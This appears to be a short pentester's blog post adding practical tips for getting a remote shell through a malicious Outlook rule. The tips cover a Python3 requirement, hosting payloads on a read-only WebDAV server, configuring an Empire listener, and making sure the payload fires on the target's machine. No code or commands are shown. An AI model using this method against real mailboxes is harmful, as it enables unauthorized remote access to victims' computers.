Malicious Outlook Rules in Action

Getting a shell using a malicious Outlook rule is an awesome tool during a pentest and great fun! Nick Landers had a great post including enough information to make this happen. Although it left a few things for the reader to figure out and there was one gotcha. In this post I provide some additional information to help you get this going.

First, the Gotcha . . .

You need to use Python3 to run the script. Otherwise you get an error similar to that shown below. Error When Run with Python 2.x

Second, details for setting up a WebDAV server . . .

The original SilentBreak Security blog post gave minimal details for setting up your WebDAV server so I provided detailed instructions here. I suggest using a read-only WebDAV server so your payloads don’t get maliciously overwritten. When you run, give it a local filename to save the rule to instead of the location on your WebDAV server. I also provide expanded information on setting up your Empire listener here to improve your chances of success.

Third, be sure to close your local instance of Outlook before sending an email to the target so that the payload executes on their machine and not yours.

Fourth, Shellz!

Additional References:

  • Getting Outlook Credentials:
  • More on Malicious Rules:


For tips on getting a shell through a malicious outlook rule without using an EXE file, see this related post.